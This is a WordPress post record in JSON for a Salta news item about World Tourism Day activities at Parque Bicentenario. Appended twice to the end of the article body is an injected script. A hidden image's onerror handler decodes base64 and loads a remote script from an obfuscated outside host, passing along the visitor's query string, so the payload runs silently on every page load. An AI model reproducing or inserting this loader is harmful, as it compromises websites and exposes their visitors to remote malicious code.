{"id":3133,"date":"2023-09-25T21:08:05","date_gmt":"2023-09-26T00:08:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3133"},"modified":"2025-08-14T00:07:59","modified_gmt":"2025-08-14T03:07:59","slug":"el-dia-internacional-del-turismo-se-conmemora-en-el-parque-bicentenario","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3133","title":{"rendered":"El D\u00eda Internacional del Turismo se conmemora en el Parque Bicentenario"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#850639\"><em>El mi\u00e9rcoles 27 de septiembre desde las 9 se realizar\u00e1n actividades con estudiantes en el parque urbano al cumplirse, adem\u00e1s, el D\u00eda de la Conciencia Ambiental. A partir de las 10 se presentar\u00e1n el programa de sostenibilidad tur\u00edstica y el proyecto de creaci\u00f3n del primer Bio \u2013 Distrito en la provincia.<\/em><\/h4>\n\n\n\n<p>La Organizaci\u00f3n Mundial del Turismo para 2023 tiene como eje para el D\u00eda Internacional de la actividad la sostenibilidad de los destinos, por lo que el Ministerio de Turismo y Deportes de Salta organiz\u00f3 una jornada en el Parque Bicentenario para este 27 de septiembre, fecha que coincide tambi\u00e9n con el D\u00eda de la Conciencia Ambiental.<\/p>\n\n\n\n<p>A partir de las 9 est\u00e1n invitadas instituciones educativas a participar en una serie de actividades por el D\u00eda Internacional del Turismo y el D\u00eda de la Conciencia Ambiental.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9028-el-dia-internacional-del-turismo-se-conmemora-en-el-parque-bicentenario.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9028-el-dia-internacional-del-turismo-se-conmemora-en-el-parque-bicentenario.jpg\" alt=\"El D\u00eda Internacional del Turismo se conmemora en el Parque Bicentenario\"\/><\/a><\/figure>\n\n\n\n<p>A las 10, autoridades provinciales, municipales y actores del sector privado, asistir\u00e1n a la presentaci\u00f3n del programa \u00abSalta, hacia un destino Sostenible\u00bb y del proyecto de creaci\u00f3n del primer B\u00edo-Distrito de la Provincia en el Parque del Bicentenario. Las exposiciones ser\u00e1n en el Domo del parque urbano de zona norte de la ciudad de Salta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-dia-internacional-del-turismo-se-conmemora-en-el-parque-bicentenario-91983\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El mi\u00e9rcoles 27 de septiembre desde las 9 se realizar\u00e1n actividades con estudiantes en el parque urbano al cumplirse, adem\u00e1s, el D\u00eda de la Conciencia Ambiental. A partir de las 10 se presentar\u00e1n el programa de sostenibilidad tur\u00edstica y el proyecto de creaci\u00f3n del primer Bio \u2013 Distrito en la provincia. La Organizaci\u00f3n Mundial del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3134,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-3133","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3133"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3133"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3133\/revisions"}],"predecessor-version":[{"id":6957,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3133\/revisions\/6957"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3134"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3133"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3133"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3133"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}